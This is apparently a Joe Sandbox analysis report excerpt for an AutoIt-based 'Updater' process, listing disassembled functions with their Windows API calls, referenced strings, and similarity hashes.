Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5b3e5219c24e38db487436f5840cf4e1437969e14af223875bf10b042f87811
Instruction ID: ec4b3777538695c868ce941b4b4208c8f4c05e4631b4d420c8763aa1f6fd3ed9
Opcode Fuzzy Hash: b5b3e5219c24e38db487436f5840cf4e1437969e14af223875bf10b042f87811
Instruction Fuzzy Hash: A9F16D3170112B8BDF0CCA6DC8B00BE76E2AB94771715432D9E67D77C4EE64DA25CAA0

Function 006F24CA Relevance: .5, Instructions: 457COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28e35ac769e7317f25c8d2f7079bfb7ba7f6bb36bb2429e733617ce6d81fc8a1
Instruction ID: fcffee9a332c84a561ba6599e64e22272f9ee7203a3c1b8200922a4aada325b4
Opcode Fuzzy Hash: 28e35ac769e7317f25c8d2f7079bfb7ba7f6bb36bb2429e733617ce6d81fc8a1
Instruction Fuzzy Hash: 20E1503170122B4BDF0CCA6DC8700BE76E2EB94771B25432D9E67D73C4EA64D925CAA0

Function 00742D81 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46b54dea1489af7714f44b6ae1e99605e4607c9557ac97342ba02afe34281449
Instruction ID: 626087c3aa3deed198b69763bda521bc0378f14f3f43aa40ecc4af98b2dbd0a0
Opcode Fuzzy Hash: 46b54dea1489af7714f44b6ae1e99605e4607c9557ac97342ba02afe34281449
Instruction Fuzzy Hash: 7B212B327201108FD718CE79C81367AB7E5A755310F15862EF4A7C73C1CE39A9008B84

Function 014C4916 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2238771515.00000000014BF000.00000040.00000020.00020000.00000000.sdmp, Offset: 014BF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_14bf000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
Instruction ID: 2a4c341ee323e34329150b9ad8fc3a8913384d918951c853ab65850e931dea43
Opcode Fuzzy Hash: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
Instruction Fuzzy Hash: A1F054362141628FE7A1CE69C5E0B96BBA4EB50D70F2D056ED25497671C330E844C650

Function 014B2ABD Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
Instruction Fuzzy Hash:

Function 00753622 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 487filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00753674
DeleteObject.GDI32(00000000), ref: 00753687
DestroyWindow.USER32 ref: 00753696
GetDesktopWindow.USER32 ref: 007536B1
GetWindowRect.USER32(00000000), ref: 007536B8
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 007537E7
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 007537F5
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0075383C
GetClientRect.USER32(00000000,?), ref: 00753848
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00753884
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007538A6
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007538B9
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007538C4
GlobalLock.KERNEL32(00000000), ref: 007538CD
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007538DC
GlobalUnlock.KERNEL32(00000000), ref: 007538E5
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007538EC
GlobalFree.KERNEL32(00000000), ref: 007538F7
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00753909
OleLoadPicture.OLEAUT32(?,00000000,00000000,00770BEC,00000000), ref: 0075391F
GlobalFree.KERNEL32(00000000), ref: 0075392F
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00753955
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00753974
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00753996
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00753B83

Strings

AutoIt v3, xrefs: 00753836
DISPLAY, xrefs: 007539E6
static, xrefs: 0075387E, 007539D5
, xrefs: 00753B09

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 1ca19fead26b08d5c6411aeec0905c03602a1567ba7ec132a5831e55fe6ee68d
Instruction ID: e3c1e4e13f2b6af1c81b23aba81208085e7c5b3885cf0eee4aadf7a3eb75a327
Opcode Fuzzy Hash: 1ca19fead26b08d5c6411aeec0905c03602a1567ba7ec132a5831e55fe6ee68d
Instruction Fuzzy Hash: 63028071A10214EFDB14DF64CC89EAE7BB9FB49351F008158F9059B2A1DBB8EE05CB64

Function 00760198 Relevance: 58.2, APIs: 10, Strings: 23, Instructions: 479windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00760288
_wcslen.LIBCMT ref: 0076029D
IsWindowVisible.USER32(?), ref: 007602DF
_wcslen.LIBCMT ref: 007602F5
IsWindowEnabled.USER32(?), ref: 00760331
_wcslen.LIBCMT ref: 00760347
_wcslen.LIBCMT ref: 00760394

Part of subcall function 006F014F: _wcslen.LIBCMT ref: 006F015A

Part of subcall function 00732E91: SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00732F15
Part of subcall function 00732E91: SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00732F28
Part of subcall function 00732E91: SendMessageW.USER32(?,00000189,?,00000000), ref: 00732F58

Part of subcall function 00732A02: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00732A0D

Strings

UNCHECK, xrefs: 00760621
GETCURRENTSELECTION, xrefs: 0076056E
GETLINE, xrefs: 00760744
SHOWDROPDOWN, xrefs: 0076042E
DELSTRING, xrefs: 007604D4
GETSELECTED, xrefs: 00760641
ISVISIBLE, xrefs: 00760294, 007602AF
EDITPASTE, xrefs: 00760705
SETCURRENTSELECTION, xrefs: 00760541
SELECTSTRING, xrefs: 00760599
HIDEDROPDOWN, xrefs: 00760464
TABLEFT, xrefs: 00760342, 00760359
CURRENTTAB, xrefs: 007603DB
FINDSTRING, xrefs: 00760501
GETLINECOUNT, xrefs: 0076066C
TABRIGHT, xrefs: 0076038F, 007603A4
SENDCOMMANDID, xrefs: 00760787
CHECK, xrefs: 00760601
GETCURRENTCOL, xrefs: 007606CE
ISENABLED, xrefs: 007602F0, 00760307
GETCURRENTLINE, xrefs: 00760693
ISCHECKED, xrefs: 007605CC
ADDSTRING, xrefs: 007604A1

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: _wcslen$MessageSend$Window$BuffCharEnabledUpperVisible
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 37000740-45149045
Opcode ID: 4af2951e8578aa10b8d4881df0d95037bda42e006fcc4e343eca2f275d6a5591
Instruction ID: 361889384cba8218b6ac20c03b639bf5323159a6c1d2b42fa782f34d3bc1f409
Opcode Fuzzy Hash: 4af2951e8578aa10b8d4881df0d95037bda42e006fcc4e343eca2f275d6a5591
Instruction Fuzzy Hash: D0029E342042019FDB54EF14C454A6A7BA2BF95348F14846CFC4B9B3A3DB39ED4ACB86

Function 006E55FB Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 006E5689
SendMessageW.USER32(00000000,00001308,?,00000000), ref: 00729128
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00729161
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0072958E

Part of subcall function 006E438C: InvalidateRect.USER32(?,00000000,00000001,?,?,?,006E5687,01433E38,?,?,?), ref: 006E43EF

SendMessageW.USER32(?,00001053), ref: 007295CA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007295E1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007295F7
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00729602

Strings

0, xrefs: 0072941E

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: b03e06fb5c2a898ee6f58c5ac20b3e97696edec4ff00a149ed1a68eec3f8f232
Instruction ID: ca48ce61e90c5889d1556bd1c15390e88577d5f635127933df0adb2f060ce4e4
Opcode Fuzzy Hash: b03e06fb5c2a898ee6f58c5ac20b3e97696edec4ff00a149ed1a68eec3f8f232
Instruction Fuzzy Hash: 9E12CF30600661EFDB21DF25D884BA5B7E6FF04304F588569F68A8B262C735EC52CF95

Function 007532BC Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 289windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 007532EF
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007533BA
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007533F8
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00753408
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0075344E
GetClientRect.USER32(00000000,?), ref: 0075345A
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007534A1
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007534B0
GetStockObject.GDI32(00000011), ref: 007534C0
SelectObject.GDI32(00000000,00000000), ref: 007534C4
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 007534D4
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007534DD
DeleteDC.GDI32(00000000), ref: 007534E6
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00753512
SendMessageW.USER32(00000030,00000000,00000001), ref: 00753529
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00753564
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00753578
SendMessageW.USER32(00000404,00000001,00000000), ref: 00753589
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007535B9
GetStockObject.GDI32(00000011), ref: 007535C4
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007535CF
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 007535D9

Strings

AutoIt v3, xrefs: 00753446
msctls_progress32, xrefs: 0075355A
DISPLAY, xrefs: 007534A6
static, xrefs: 0075349B, 007535B3

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: ea5138015c4fe2b3cbef2c5532e8f13486affa35114f7a3b83d9f2bed26c05de
Instruction ID: dffdbb015ee6618d27eba4aff639e46c1073c447b822e4b5f747e83224d68f11
Opcode Fuzzy Hash: ea5138015c4fe2b3cbef2c5532e8f13486affa35114f7a3b83d9f2bed26c05de
Instruction Fuzzy Hash: A1A19571A10214BFDB14DF64DC49FAF7BB9EB49710F008115FA15AB2E1DAB8AD01CB64

Function 00735217 Relevance: 44.1, APIs: 12, Strings: 13, Instructions: 381COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 007352BE

Part of subcall function 00735096: CharUpperBuffW.USER32(?,?,00000000,0076D938,?,00000000,?,?,?,00735334,-00000001,-00000001,-00000002,-00000001), ref: 00735123

_wcslen.LIBCMT ref: 00735344
_wcslen.LIBCMT ref: 007353B0
GetForegroundWindow.USER32 ref: 007353F5
_wcslen.LIBCMT ref: 00735406
IsWindow.USER32(?), ref: 00735446
_wcslen.LIBCMT ref: 00735483
_wcslen.LIBCMT ref: 007354DE
_wcslen.LIBCMT ref: 00735547
_wcslen.LIBCMT ref: 007355AB
_wcslen.LIBCMT ref: 0073560C
_wcslen.LIBCMT ref: 0073566C

Strings

HANDLE, xrefs: 00735401, 00735414
REGEXPTITLE, xrefs: 0073547E, 00735491
CLASS, xrefs: 007354D9, 007354EC
REGEXPCLASS, xrefs: 00735542, 00735555
@jy, xrefs: 0073561A
h@jy, xrefs: 00735607
h<jy, xrefs: 007355A6
hDjy, xrefs: 00735667
LAST, xrefs: 0073533F, 0073535E
Hjy, xrefs: 007356C7
Djy, xrefs: 0073567A
ACTIVE, xrefs: 007353AB, 007353BE
<jy, xrefs: 007355B9

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: _wcslen$Window$Foreground$BuffCharUpper
String ID: <jy$@jy$ACTIVE$CLASS$Djy$HANDLE$Hjy$LAST$REGEXPCLASS$REGEXPTITLE$h<jy$h@jy$hDjy
API String ID: 86693105-4091155465
Opcode ID: 44718af64ac82a66952087151c27885ec0a91b08a7e7bc58303ee77d2582423b
Instruction ID: 67e03e7c9f92d6b8236c4e6f781d081344c68470761d661c8600fc6959f354c4
Opcode Fuzzy Hash: 44718af64ac82a66952087151c27885ec0a91b08a7e7bc58303ee77d2582423b
Instruction Fuzzy Hash: CFE12D71A047029BEB14DF68D4819BAB3B2FF50344F40852DE45287652FB78FD59CB92

Function 014A9455 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 014A945E

Part of subcall function 014A941D: GetProcAddress.KERNEL32(00000000), ref: 014A943B

Strings

VarBoolFromStr, xrefs: 014A95F8
VarR4FromStr, xrefs: 014A95A0
VarI4FromStr, xrefs: 014A958A
VarOr, xrefs: 014A9548
VarAnd, xrefs: 014A9532
VarCyFromStr, xrefs: 014A95E2
VarMod, xrefs: 014A951C
VarBstrFromBool, xrefs: 014A963A
VarBstrFromDate, xrefs: 014A9624
VarSub, xrefs: 014A94C4
oleaut32.dll, xrefs: 014A9459
VarAdd, xrefs: 014A94AE
VarMul, xrefs: 014A94DA
VarXor, xrefs: 014A955E
VarDiv, xrefs: 014A94F0
VariantChangeTypeEx, xrefs: 014A946C
VarBstrFromCy, xrefs: 014A960E
VarCmp, xrefs: 014A9574
VarIdiv, xrefs: 014A9506
VarR8FromStr, xrefs: 014A95B6
VarDateFromStr, xrefs: 014A95CC
VarNeg, xrefs: 014A9482
VarNot, xrefs: 014A9498

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 40434d9de5454e60802a0820427540b6c5adf449d9b3c4f8267f3955e4f02b2f
Instruction ID: 94383d7c7292974bf90771adf369221cf953d622dc3e0f1649e956f197591b58
Opcode Fuzzy Hash: 40434d9de5454e60802a0820427540b6c5adf449d9b3c4f8267f3955e4f02b2f
Instruction Fuzzy Hash: 334142A17096569B52146B6EF44082677DEE7742183F3803FB414CB779DF34AC028FAA

Function 00760C42 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 354windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00760CF0
_wcslen.LIBCMT ref: 00760D27
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00760D68
_wcslen.LIBCMT ref: 00760D78
_wcslen.LIBCMT ref: 00760DBF
_wcslen.LIBCMT ref: 00760E31
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00760E72
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00760EA4

Part of subcall function 006F014F: _wcslen.LIBCMT ref: 006F015A

Part of subcall function 00733498: SendMessageW.USER32(?,0000102B,?,00000000), ref: 007334F8

Strings

GETTEXT, xrefs: 00760DBA, 00760DCD
GETSELECTED, xrefs: 00760F9B
ISSELECTED, xrefs: 00760E7D
SELECTALL, xrefs: 00760EB5
SELECTCLEAR, xrefs: 00760ED9
GETSELECTEDCOUNT, xrefs: 00760E2C, 00760E3D
SELECTINVERT, xrefs: 00760F3D
DESELECT, xrefs: 00760F5B
GETITEMCOUNT, xrefs: 00760D22, 00760D35
VIEWCHANGE, xrefs: 0076102D
GETSUBITEMCOUNT, xrefs: 00760D73, 00760D86
FINDITEM, xrefs: 00760FE1
SELECT, xrefs: 00760EFD

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: f22c5a79b66a7188e35447ce9952916df92aa18490669904c8bfa018ca8c3685
Instruction ID: 1322813a5d18a134b700618a86623d5b678a9a7dd9d7aceecbbe3327bd7e1b9a
Opcode Fuzzy Hash: f22c5a79b66a7188e35447ce9952916df92aa18490669904c8bfa018ca8c3685
Instruction Fuzzy Hash: 93D104307042119FCB14EF28C855A6A77A2AF85314F04896DFC5B9B3A3DB3AED45C786

Function 00734198 Relevance: 33.6, APIs: 8, Strings: 11, Instructions: 362COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0073423F
_wcslen.LIBCMT ref: 007342AC
_wcslen.LIBCMT ref: 00734310

Strings

INSTANCE, xrefs: 007344FF
CLASS, xrefs: 0073423A, 00734256
Hjy, xrefs: 007344CE
(jy, xrefs: 00734397
CLASSNN, xrefs: 007342A7, 007342BA
TEXT, xrefs: 0073452D
REGEXPCLASS, xrefs: 0073430B, 0073431E
@jy, xrefs: 0073446C
NAME, xrefs: 007343D9, 007343EC
<jy, xrefs: 0073443E
Djy, xrefs: 0073449D

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: _wcslen
String ID: (jy$<jy$@jy$CLASS$CLASSNN$Djy$Hjy$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1134008298
Opcode ID: 774c88e633b4870b7ae236ab464a760c2c0d08fde359655670b9782e4346961a
Instruction ID: a4bcfc3172168176b096db8a0ce06b70ad80db279c78ee3d256062062151a0f4
Opcode Fuzzy Hash: 774c88e633b4870b7ae236ab464a760c2c0d08fde359655670b9782e4346961a
Instruction Fuzzy Hash: 73D1B471E00205ABEB1CDFA4D881BEEB775BF15304F50C129E91AA7202EB39BD59CB51

Function 0075CDB7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0075CEBD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0076D938,00000000,?,00000000,?,?), ref: 0075CF44
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0075CFA4
_wcslen.LIBCMT ref: 0075CFF4
_wcslen.LIBCMT ref: 0075D06F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0075D0B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0075D1C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0075D24D
RegCloseKey.ADVAPI32(?), ref: 0075D281
RegCloseKey.ADVAPI32(00000000), ref: 0075D28E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0075D360

Strings

REG_DWORD, xrefs: 0075D204
REG_EXPAND_SZ, xrefs: 0075CFCD
REG_BINARY, xrefs: 0075D313
REG_SZ, xrefs: 0075D044
REG_MULTI_SZ, xrefs: 0075D0F5
REG_QWORD, xrefs: 0075D2C3

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
